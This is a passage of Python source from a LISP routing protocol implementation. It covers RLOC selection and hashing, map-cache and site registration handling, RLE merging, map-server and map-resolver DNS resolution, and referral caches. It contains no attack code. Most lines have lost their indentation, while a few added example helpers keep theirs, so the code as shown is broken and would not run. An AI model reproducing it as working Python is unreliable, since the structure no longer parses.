if (rloc.up_state()): pr = min(rloc.priority, pr)
#endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply it will never get.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if it doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12:i+13])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# If this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (rloc.rle_name in lisp_rle_list):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
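#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): map_cache_ttl is stored in seconds and print_ttl() renders it
# in human-readable units.
#
def lisp_mapping_ttl_example():
    mc = lisp_mapping("", "", [])
    mc.map_cache_ttl = 7200
    return(mc.print_ttl())   # "2 hours"
#enddef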
class lisp_dynamic_eid(object):
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping(object):
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in list(lisp_group_mapping_list.values()):
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
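#
# Illustrative sketch (added for exposition; not called anywhere in this
# file): register a group-mapping for 224.1.0.0/16 and look up a group
# covered by it. The names and addresses are made-up examples; note that
# add_group() mutates the global lisp_group_mapping_list.
#
def lisp_group_lookup_example():
    group_prefix = lisp_address(LISP_AFI_IPV4, "224.1.0.0", 16, 0)
    gm = lisp_group_mapping("example-gm", "all", group_prefix, [], None)
    gm.add_group()
    return(lisp_lookup_group("224.1.1.1"))   # returns gm
#enddef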
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site(object):
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid(object):
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
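    #
    # Sketch of print_flags() output (example values assumed): a site-EID
    # that requested proxy map-replies and Map-Notifies, with nothing else
    # set, yields "P-s-i-t-r-m-N" from print_flags(False); upper-case means
    # the flag is set, lower-case means it is not.
    #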
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
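    #
    # Assumed key layout (inferred from the splicing above, not normative):
    # build_key() returns a mask-length and a lookup key whose first 12
    # characters encode instance-id/AFI; build_sort_key() splices the
    # mask-length in as "<iid-afi>-<mask-len>-<addr>" and, for (S,G)
    # entries, appends a "-<group-key>" suffix so entries sort by EID
    # then group.
    #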
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in list(self.individual_registrations.values()):
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
            found_dup = False
            for re in new_list:
                if (re.rloc.is_null()): continue
                if (rloc_entry.rloc.is_exact_match(re.rloc)):
                    found_dup = True
                    break
                #endif
            #endfor
            if (found_dup == False): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
        #endfor
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in list(self.individual_registrations.values()):
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (addr in new_rle): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (list(old_rle.keys()) == list(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
list(old_rle.keys()), list(new_rle.keys())))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
            # longest match lookups of (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr(object):
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, create other
        # lisp_mr() entries for all A-records. Only the master (A-record
        # index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in list(lisp_map_resolvers_list.values()):
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (key not in lisp_map_resolvers_list): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root(object):
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in list(self.referral_set.values()):
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
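    #
    # Example print_ttl() values: 45 -> "45 secs", 120 -> "2 mins",
    # 90 -> "90 secs" (only whole minutes are printed as minutes).
    #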
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node(object):
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms(object):
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = list(lisp_map_servers_list.values())[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, create other
        # lisp_ms() entries for all A-records. Only the master (A-record
        # index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in list(lisp_map_servers_list.values()):
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (key not in lisp_map_servers_list): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface(object):
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
            s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime(object):
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
        if (month < "01" or month > "12"): return(False)
        if (day < "01" or day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
        if (hour < "00" or hour > "23"): return(False)
